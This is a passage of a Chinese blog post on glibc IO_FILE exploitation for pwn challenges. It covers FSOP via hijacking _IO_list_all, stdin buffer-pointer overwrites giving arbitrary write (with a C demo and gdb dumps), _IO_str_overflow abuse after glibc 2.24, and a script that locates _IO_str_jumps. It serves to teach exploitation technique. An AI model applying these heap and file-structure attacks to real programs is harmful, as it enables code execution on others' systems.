class="line">          &#125;</span><br><span class="line">        ...</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>可见其在满足<code>fp-&gt;_mode &lt;= 0 &amp;&amp; fp-&gt;_IO_write_ptr &gt; fp-&gt;_IO_write_base</code>的情况下就会调用<code>_IO_FILE_plus.vtable</code>中的<code>_IO_overflow</code>函数，而我们将<code>_IO_list_all</code>的值修改成我们可控的地址，也就意味着<code>vtable</code>的值是可控的，也就意味着<code>vtable</code>中的函数指针是可控的，所以就可以通过这种方式来让程序调用我们控制的<code>_IO_overflow</code>指针</p>
<p>稍微梳理一下其实可以发现，FSOP的本质其实仍然是劫持vtable，只不过这次其先将<code>_IO_list_all</code>劫持了，就相当可以伪造整个<code>_IO_FILE_plus</code>结构。</p>
<p>同时要注意满足<code>fp-&gt;_mode &lt;= 0 &amp;&amp; fp-&gt;_IO_write_ptr &gt; fp-&gt;_IO_write_base</code>这个条件，在FILE结构中可见它们三个的偏移分别为：0xc0、0x28、0x20</p>
<h3 id="例题一"><a href="#例题一" class="headerlink" title="例题一"></a>例题一</h3><p>在unsorted bin attack将<code>_IO_list_all</code>改成<code>main_arena + 88</code>之后（没tcache之前unsorted bin就在main_arena+88），<code>_IO_list_all</code>所指向的结构如下：</p>
<img src="/2022/06/08/IO-FILE/fsop-1.jpg" class>

<p>可见此时的数据都是<code>main_arena</code>本身的数据，所以我们无法控制，但是这时该结构的<code>_chain</code>指针为<code>main_arena + 168</code>，这个地址对应的是0x60大小的small bin，所以如果我们后续能<strong>将一个0x60大小的chunk放到small bin的话，这个地址就会被改写成那个chunk的地址，也就变成了一个可控的地址</strong>。</p>
<p>如下：</p>
<img src="/2022/06/08/IO-FILE/fsop-2.jpg" class>

<p>可见其中<code>_chain</code>指针被修改成了chunk地址</p>
<h2 id="glibc-2-24-下-IO-FILE-的利用"><a href="#glibc-2-24-下-IO-FILE-的利用" class="headerlink" title="glibc 2.24 下 IO_FILE 的利用"></a>glibc 2.24 下 IO_FILE 的利用</h2><p>从glibc 2.24开始加入了对vtable合法性的检测，如果vtable不在<code>_IO_vtable </code>段中，那么程序会调用<code>_IO_vtable_check()</code>函数进行进一步的检查，这个check具体我没有审，但是似乎很难绕过。</p>
<p>所以从这个版本开始，针对vtable进行的攻击变得难以执行，我们利用的关注点就转向<code>_IO_FILE</code>内部</p>
<h3 id="修改-IO-FILE完成任意地址读写"><a href="#修改-IO-FILE完成任意地址读写" class="headerlink" title="修改_IO_FILE完成任意地址读写"></a>修改_IO_FILE完成任意地址读写</h3><p>在<code>_IO_FILE</code>结构被初始化之后，<code>_IO_buf_base</code>表示该文件流缓冲区的起始地址，<code>_IO_buf_end</code>表示该缓冲区的结束地址，在我们调用IO函数的时候，程序会创建一片内存来用作IO的缓冲区，例如调用<code>scanf(&quot;%s&quot;,stack_buf);</code>时，程序会将我们的输入首先输入到为标准输入创建的缓冲区中，当输入完毕之后程序再将该缓冲区中的内容拷贝到<code>stack_buf</code>变量中，这个中间过程其实还有很多细节，但是这里先不关注。</p>
<p>那么这也就意味着如果我们能够控制哪里作为标准输入的缓冲区的话，就相当于有了任意地址写，同理如果控制标准输出的缓冲区就相当于有了任意地址读。具体其实就是修改<code>_IO_buf_base</code>以及<code>_IO_buf_end</code>这两个指针。</p>
<h4 id="demo"><a href="#demo" class="headerlink" title="demo"></a>demo</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">char</span> test[<span class="number">100</span>] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line">	<span class="keyword">int</span> a = <span class="number">0</span>;</span><br><span class="line">	<span class="keyword">size_t</span> *fp = <span class="built_in">stdin</span>;</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;%p\n&quot;</span>,fp);</span><br><span class="line">	<span class="built_in">scanf</span>(<span class="string">&quot;%d&quot;</span>,&amp;a);</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;test = %s\n&quot;</span>,test);</span><br><span class="line">	fp[<span class="number">7</span>] = test;</span><br><span class="line">	fp[<span class="number">8</span>] = test+<span class="number">100</span>;</span><br><span class="line">	<span class="built_in">scanf</span>(<span class="string">&quot;%d&quot;</span>,&amp;a);</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;now test = %s\n&quot;</span>,test);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>自己写的一个小demo，第一次scanf是为了初始化stdin的FILE结构，然后将stdin的<code>_IO_buf_base</code>和<code>_IO_buf_end</code>域分别改成test数组的起始地址、起始地址+100，然后再次进行一次输入，可以发现test数组已经被作为标准输入的缓冲区了</p>
<p>初始化后的<code>_IO_2_1_stdin_</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ p _IO_2_1_stdin_</span><br><span class="line">$1 = &#123;</span><br><span class="line">  file = &#123;</span><br><span class="line">    _flags = 0xfbad2288, </span><br><span class="line">    _IO_read_ptr = 0x602426 &quot;\n&quot;, </span><br><span class="line">    _IO_read_end = 0x602427 &quot;&quot;, </span><br><span class="line">    _IO_read_base = 0x602420 &quot;123123\n&quot;, </span><br><span class="line">    _IO_write_base = 0x602420 &quot;123123\n&quot;, </span><br><span class="line">    _IO_write_ptr = 0x602420 &quot;123123\n&quot;, </span><br><span class="line">    _IO_write_end = 0x602420 &quot;123123\n&quot;, </span><br><span class="line">    _IO_buf_base = 0x602420 &quot;123123\n&quot;, </span><br><span class="line">    _IO_buf_end = 0x602820 &quot;&quot;, </span><br><span class="line">    _IO_save_base = 0x0, </span><br><span class="line">    _IO_backup_base = 0x0, </span><br><span class="line">    _IO_save_end = 0x0, </span><br><span class="line">    _markers = 0x0, </span><br><span class="line">    _chain = 0x0, </span><br><span class="line">    _fileno = 0x0, </span><br><span class="line">    _flags2 = 0x0, </span><br><span class="line">    _old_offset = 0xffffffffffffffff, </span><br><span class="line">    _cur_column = 0x0, </span><br><span class="line">    _vtable_offset = 0x0, </span><br><span class="line">    _shortbuf = &quot;&quot;, </span><br><span class="line">    _lock = 0x7ffff7dd3790 &lt;_IO_stdfile_0_lock&gt;, </span><br><span class="line">    _offset = 0xffffffffffffffff, </span><br><span class="line">    _codecvt = 0x0, </span><br><span class="line">    _wide_data = 0x7ffff7dd19c0 &lt;_IO_wide_data_0&gt;, </span><br><span class="line">    _freeres_list = 0x0, </span><br><span class="line">    _freeres_buf = 0x0, </span><br><span class="line">    __pad5 = 0x0, </span><br><span class="line">    _mode = 0xffffffff, </span><br><span class="line">    _unused2 = &#x27;\000&#x27; &lt;repeats 19 times&gt;</span><br><span class="line">  &#125;, </span><br><span class="line">  vtable = 0x7ffff7dd06e0 &lt;_IO_file_jumps&gt;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>修改后</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ p _IO_2_1_stdin_</span><br><span class="line">$3 = &#123;</span><br><span class="line">  file = &#123;</span><br><span class="line">    _flags = 0xfbad2288, </span><br><span class="line">    _IO_read_ptr = 0x602426 &quot;\n&quot;, </span><br><span class="line">    _IO_read_end = 0x602427 &quot;&quot;, </span><br><span class="line">    _IO_read_base = 0x602420 &quot;123123\n&quot;, </span><br><span class="line">    _IO_write_base = 0x602420 &quot;123123\n&quot;, </span><br><span class="line">    _IO_write_ptr = 0x602420 &quot;123123\n&quot;, </span><br><span class="line">    _IO_write_end = 0x602420 &quot;123123\n&quot;, </span><br><span class="line">    _IO_buf_base = 0x7fffffffdbf0 &quot;&quot;, 			#已经被修改</span><br><span class="line">    _IO_buf_end = 0x7fffffffdc54 &quot;\377\177&quot;, </span><br><span class="line">    _IO_save_base = 0x0, </span><br><span class="line">    _IO_backup_base = 0x0, </span><br><span class="line">    _IO_save_end = 0x0, </span><br><span class="line">    _markers = 0x0, </span><br><span class="line">    _chain = 0x0, </span><br><span class="line">    _fileno = 0x0, </span><br><span class="line">    _flags2 = 0x0, </span><br><span class="line">    _old_offset = 0xffffffffffffffff, </span><br><span class="line">    _cur_column = 0x0, </span><br><span class="line">    _vtable_offset = 0x0, </span><br><span class="line">    _shortbuf = &quot;&quot;, </span><br><span class="line">    _lock = 0x7ffff7dd3790 &lt;_IO_stdfile_0_lock&gt;, </span><br><span class="line">    _offset = 0xffffffffffffffff, </span><br><span class="line">    _codecvt = 0x0, </span><br><span class="line">    _wide_data = 0x7ffff7dd19c0 &lt;_IO_wide_data_0&gt;, </span><br><span class="line">    _freeres_list = 0x0, </span><br><span class="line">    _freeres_buf = 0x0, </span><br><span class="line">    __pad5 = 0x0, </span><br><span class="line">    _mode = 0xffffffff, </span><br><span class="line">    _unused2 = &#x27;\000&#x27; &lt;repeats 19 times&gt;</span><br><span class="line">  &#125;, </span><br><span class="line">  vtable = 0x7ffff7dd06e0 &lt;_IO_file_jumps&gt;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>再次进行输入后可以看到其它域也被更改了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ p _IO_2_1_stdin_</span><br><span class="line">$4 = &#123;</span><br><span class="line">  file = &#123;</span><br><span class="line">    _flags = 0xfbad2288, </span><br><span class="line">    _IO_read_ptr = 0x7fffffffdbf0 &quot;/bin/sh\n&quot;, </span><br><span class="line">    _IO_read_end = 0x7fffffffdbf8 &quot;&quot;, </span><br><span class="line">    _IO_read_base = 0x7fffffffdbf0 &quot;/bin/sh\n&quot;, </span><br><span class="line">    _IO_write_base = 0x7fffffffdbf0 &quot;/bin/sh\n&quot;, </span><br><span class="line">    _IO_write_ptr = 0x7fffffffdbf0 &quot;/bin/sh\n&quot;, </span><br><span class="line">    _IO_write_end = 0x7fffffffdbf0 &quot;/bin/sh\n&quot;, </span><br><span class="line">    _IO_buf_base = 0x7fffffffdbf0 &quot;/bin/sh\n&quot;, </span><br><span class="line">    _IO_buf_end = 0x7fffffffdc54 &quot;\377\177&quot;, </span><br><span class="line">    _IO_save_base = 0x0, </span><br><span class="line">    _IO_backup_base = 0x0, </span><br><span class="line">    _IO_save_end = 0x0, </span><br><span class="line">    _markers = 0x0, </span><br><span class="line">    _chain = 0x0, </span><br><span class="line">    _fileno = 0x0, </span><br><span class="line">    _flags2 = 0x0, </span><br><span class="line">    _old_offset = 0xffffffffffffffff, </span><br><span class="line">    _cur_column = 0x0, </span><br><span class="line">    _vtable_offset = 0x0, </span><br><span class="line">    _shortbuf = &quot;&quot;, </span><br><span class="line">    _lock = 0x7ffff7dd3790 &lt;_IO_stdfile_0_lock&gt;, </span><br><span class="line">    _offset = 0xffffffffffffffff, </span><br><span class="line">    _codecvt = 0x0, </span><br><span class="line">    _wide_data = 0x7ffff7dd19c0 &lt;_IO_wide_data_0&gt;, </span><br><span class="line">    _freeres_list = 0x0, </span><br><span class="line">    _freeres_buf = 0x0, </span><br><span class="line">    __pad5 = 0x0, </span><br><span class="line">    _mode = 0xffffffff, </span><br><span class="line">    _unused2 = &#x27;\000&#x27; &lt;repeats 19 times&gt;</span><br><span class="line">  &#125;, </span><br><span class="line">  vtable = 0x7ffff7dd06e0 &lt;_IO_file_jumps&gt;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>效果</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$ ./a.out </span><br><span class="line">0x7ffff7dd18e0</span><br><span class="line">123123	#第一次输入</span><br><span class="line">test = </span><br><span class="line">/bin/sh	#第二次输入</span><br><span class="line">now test = /bin/sh</span><br></pre></td></tr></table></figure>

<h3 id="IO-str-jumps"><a href="#IO-str-jumps" class="headerlink" title="_IO_str_jumps"></a>_IO_str_jumps</h3><p>前面讲了从glibc-2.24开始加入了对vtable合法性的check，所以难以将vtable修改成一个我们可控的地址。</p>
<p>正常情况下<code>_IO_FILE_plus</code>结构中的vtable是<code>_IO_file_jumps</code>类型的，但是libc中其实不止这一个虚表，还有<code>_IO_str_jumps</code>、<code>_IO_wstr_jumps</code>等等，这些表都位于vtable段中，所以能通过check，虽然它们同样位于不可控的内存中，但是这些虚表中有一些函数本身就可以被我们所利用。</p>
<p>其中<code>_IO_str_jumps</code>表如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> <span class="class"><span class="keyword">struct</span> _<span class="title">IO_jump_t</span> _<span class="title">IO_str_jumps</span> <span class="title">libio_vtable</span> =</span></span><br><span class="line">&#123;</span><br><span class="line">  JUMP_INIT_DUMMY,</span><br><span class="line">  JUMP_INIT(finish, _IO_str_finish),</span><br><span class="line">  JUMP_INIT(overflow, _IO_str_overflow),</span><br><span class="line">  JUMP_INIT(underflow, _IO_str_underflow),</span><br><span class="line">  JUMP_INIT(uflow, _IO_default_uflow),</span><br><span class="line">  JUMP_INIT(pbackfail, _IO_str_pbackfail),</span><br><span class="line">  JUMP_INIT(xsputn, _IO_default_xsputn),</span><br><span class="line">  JUMP_INIT(xsgetn, _IO_default_xsgetn),</span><br><span class="line">  JUMP_INIT(seekoff, _IO_str_seekoff),</span><br><span class="line">  JUMP_INIT(seekpos, _IO_default_seekpos),</span><br><span class="line">  JUMP_INIT(setbuf, _IO_default_setbuf),</span><br><span class="line">  JUMP_INIT(sync, _IO_default_sync),</span><br><span class="line">  JUMP_INIT(doallocate, _IO_default_doallocate),</span><br><span class="line">  JUMP_INIT(read, _IO_default_read),</span><br><span class="line">  JUMP_INIT(write, _IO_default_write),</span><br><span class="line">  JUMP_INIT(seek, _IO_default_seek),</span><br><span class="line">  JUMP_INIT(close, _IO_default_close),</span><br><span class="line">  JUMP_INIT(stat, _IO_default_stat),</span><br><span class="line">  JUMP_INIT(showmanyc, _IO_default_showmanyc),</span><br><span class="line">  JUMP_INIT(imbue, _IO_default_imbue)</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<h4 id="IO-str-overflow"><a href="#IO-str-overflow" class="headerlink" title="_IO_str_overflow"></a>_IO_str_overflow</h4><p>首先关注<code>_IO_str_overflow</code>这个函数，其源码如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span></span><br><span class="line">_IO_str_overflow (_IO_FILE *fp, <span class="keyword">int</span> c)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">int</span> flush_only = c == EOF;</span><br><span class="line">  _IO_size_t pos;</span><br><span class="line">  <span class="keyword">if</span> (fp-&gt;_flags &amp; _IO_NO_WRITES)<span class="comment">// pass</span></span><br><span class="line">      <span class="keyword">return</span> flush_only ? <span class="number">0</span> : EOF;</span><br><span class="line">  <span class="keyword">if</span> ((fp-&gt;_flags &amp; _IO_TIED_PUT_GET) &amp;&amp; !(fp-&gt;_flags &amp; _IO_CURRENTLY_PUTTING))</span><br><span class="line">    &#123;</span><br><span class="line">      fp-&gt;_flags |= _IO_CURRENTLY_PUTTING;</span><br><span class="line">      fp-&gt;_IO_write_ptr = fp-&gt;_IO_read_ptr;</span><br><span class="line">      fp-&gt;_IO_read_ptr = fp-&gt;_IO_read_end;</span><br><span class="line">    &#125;</span><br><span class="line">  pos = fp-&gt;_IO_write_ptr - fp-&gt;_IO_write_base;</span><br><span class="line">  <span class="keyword">if</span> (pos &gt;= (_IO_size_t) (_IO_blen (fp) + flush_only))<span class="comment">// should in </span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">if</span> (fp-&gt;_flags &amp; _IO_USER_BUF) <span class="comment">/* not allowed to enlarge */</span> <span class="comment">// pass</span></span><br><span class="line">    <span class="keyword">return</span> EOF;</span><br><span class="line">      <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">char</span> *new_buf;</span><br><span class="line">      <span class="keyword">char</span> *old_buf = fp-&gt;_IO_buf_base;</span><br><span class="line">      <span class="keyword">size_t</span> old_blen = _IO_blen (fp);</span><br><span class="line">      _IO_size_t new_size = <span class="number">2</span> * old_blen + <span class="number">100</span>;</span><br><span class="line">      <span class="keyword">if</span> (new_size &lt; old_blen)<span class="comment">//pass 一般会通过</span></span><br><span class="line">        <span class="keyword">return</span> EOF;</span><br><span class="line">      new_buf</span><br><span class="line">        = (<span class="keyword">char</span> *) (*((_IO_strfile *) fp)-&gt;_s._allocate_buffer) (new_size);<span class="comment">//重点！</span></span><br><span class="line">      <span class="keyword">if</span> (new_buf == <span class="literal">NULL</span>)</span><br><span class="line">        &#123;</span><br><span class="line">          <span class="comment">/*      __ferror(fp) = 1; */</span></span><br><span class="line">          <span class="keyword">return</span> EOF;</span><br><span class="line">        &#125;</span><br><span class="line">      <span class="keyword">if</span> (old_buf)</span><br><span class="line">        &#123;</span><br><span class="line">          <span class="built_in">memcpy</span> (new_buf, old_buf, old_blen);</span><br><span class="line">          (*((_IO_strfile *) fp)-&gt;_s._free_buffer) (old_buf);</span><br><span class="line">          <span class="comment">/* Make sure _IO_setb won&#x27;t try to delete _IO_buf_base. */</span></span><br><span class="line">          fp-&gt;_IO_buf_base = <span class="literal">NULL</span>;</span><br><span class="line">        &#125;</span><br><span class="line">      <span class="built_in">memset</span> (new_buf + old_blen, <span class="string">&#x27;\0&#x27;</span>, new_size - old_blen);</span><br><span class="line"></span><br><span class="line">      _IO_setb (fp, new_buf, new_buf + new_size, <span class="number">1</span>);</span><br><span class="line">      fp-&gt;_IO_read_base = new_buf + (fp-&gt;_IO_read_base - old_buf);</span><br><span class="line">      fp-&gt;_IO_read_ptr = new_buf + (fp-&gt;_IO_read_ptr - old_buf);</span><br><span class="line">      fp-&gt;_IO_read_end = new_buf + (fp-&gt;_IO_read_end - old_buf);</span><br><span class="line">      fp-&gt;_IO_write_ptr = new_buf + (fp-&gt;_IO_write_ptr - old_buf);</span><br><span class="line"></span><br><span class="line">      fp-&gt;_IO_write_base = new_buf;</span><br><span class="line">      fp-&gt;_IO_write_end = fp-&gt;_IO_buf_end;</span><br><span class="line">    &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (!flush_only)</span><br><span class="line">    *fp-&gt;_IO_write_ptr++ = (<span class="keyword">unsigned</span> <span class="keyword">char</span>) c;</span><br><span class="line">  <span class="keyword">if</span> (fp-&gt;_IO_write_ptr &gt; fp-&gt;_IO_read_end)</span><br><span class="line">    fp-&gt;_IO_read_end = fp-&gt;_IO_write_ptr;</span><br><span class="line">  <span class="keyword">return</span> c;</span><br><span class="line">&#125;</span><br><span class="line">libc_hidden_def (_IO_str_overflow)</span><br></pre></td></tr></table></figure>

<p>其中重点在<code>new_buf = (char *) (*((_IO_strfile *) fp)-&gt;_s._allocate_buffer) (new_size);</code>这行命令中，这里直接用<code>fp</code>指针来调用了一个函数，而且其参数<code>new_size</code>由前文可知是可控的（通过<code>_IO_FILE</code>中的字段）</p>
<p>那么显然这就是一个可以利用的函数，值得注意的是，<code>_IO_str_jumps</code>表中的<code>_IO_str_overflow</code>函数跟<code>_IO_file_jumps</code>表中的<code>_IO_new_file_overflow</code>函数的偏移是一致的，那么就意味着如果直接把vtable改成<code>_IO_str_jumps</code>的话，程序调用<code>_IO_new_file_overflow</code>时就相当于调用了<code>_IO_str_overflow</code>了，这两个函数的区别就在于我们能够利用后者来调用一个可控的函数指针以及其参数，而前者不行。</p>
<p>所以整体的利用流程就很简单了，只需要将<code>_IO_list_all</code>劫持到一个可控的内存区域，然后在<code>_IO_FILE</code>中布置合理的数据，将vtable直接改成<code>_IO_str_jumps</code>即可，最后触发方式就跟FSOP一样：libc的abort流程、exit函数的调用。</p>
<p>最后再梳理一下<code>_IO_FILE</code>应该布置什么数据就好了</p>
<h4 id="定位-IO-str-jumps"><a href="#定位-IO-str-jumps" class="headerlink" title="定位_IO_str_jumps"></a>定位_IO_str_jumps</h4><p>在一些libc版本中不会有<code>_IO_str_jumps</code>表的符号，所以不能直接用<code>libc.symbols[]</code>来确定其偏移，但是因为<code>_IO_str_jumps</code>表中会有<code>_IO_str_underflow</code>函数，而且<code>_IO_str_jumps</code>表的地址一定比<code>_IO_file_jumps</code>高，所以可以用下面这个脚本来确定<code>_IO_str_jumps</code>表在libc中的偏移</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">IO_file_jumps_offset = libc.sym[<span class="string">&#x27;_IO_file_jumps&#x27;</span>]</span><br><span class="line">IO_str_underflow_offset = libc.sym[<span class="string">&#x27;_IO_str_underflow&#x27;</span>]</span><br><span class="line"><span class="keyword">for</span> ref_offset <span class="keyword">in</span> libc.search(p64(IO_str_underflow_offset)):</span><br><span class="line">    possible_IO_str_jumps_offset = ref_offset - <span class="number">0x20</span></span><br><span class="line">    <span class="keyword">if</span> possible_IO_str_jumps_offset &gt; IO_file_jumps_offset:</span><br><span class="line">        <span class="built_in">print</span> possible_IO_str_jumps_offset</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">IO_str_jumps = libc_base + possible_IO_str_jumps_offset</span><br></pre></td></tr></table></figure>

<p>手动找方法也同理，先查看<code>_IO_str_underflow</code>函数的地址，再看哪里存有其地址，最后找到那个比<code>_IO_file_jumps</code>大的地址就行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ p &amp;_IO_str_underflow</span><br><span class="line">$10 = (&lt;text variable, no debug info&gt; *) 0x7ffff7a89c30 &lt;__GI__IO_str_underflow&gt;</span><br><span class="line">gdb-peda$ search -p 0x7ffff7a89c30</span><br><span class="line">warning: Unable to access 16000 bytes of target memory at 0x7ffff7bd4d07, halting search.</span><br><span class="line">libc-2.23.so    0x7ffff7dd0400 0x7ffff7a89c30</span><br><span class="line">libc-2.23.so    0x7ffff7dd04c0 0x7ffff7a89c30</span><br><span class="line">libc-2.23.so    0x7ffff7dd07c0 0x7ffff7a89c30</span><br><span class="line">libc-2.23.so    0x7ffff7dd0980 0x7ffff7a89c30</span><br><span class="line">gdb-peda$ p &amp;_IO_file_jumps</span><br><span class="line">$11 = (const struct _IO_jump_t *) 0x7ffff7dd06e0 &lt;_IO_file_jumps&gt;</span><br><span class="line">gdb-peda$ x/32gx 0x7ffff7dd07c0</span><br><span class="line">0x7ffff7dd07c0 &lt;_IO_str_jumps+32&gt;:	0x00007ffff7a89c30	0x00007ffff7a88610</span><br><span class="line">0x7ffff7dd07d0 &lt;_IO_str_jumps+48&gt;:	0x00007ffff7a89f90	0x00007ffff7a88640</span><br></pre></td></tr></table></figure>


    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/pwn/" rel="tag"># pwn</a>
              <a href="/tags/IO-FILE/" rel="tag"># IO_FILE</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/06/03/%E5%87%BA%E9%A2%98%E8%AE%B0%E5%BD%95/" rel="prev" title="出题记录">
      <i class="fa fa-chevron-left"></i> 出题记录
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/06/08/house-of-force/" rel="next" title="house_of_force">
      house_of_force <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
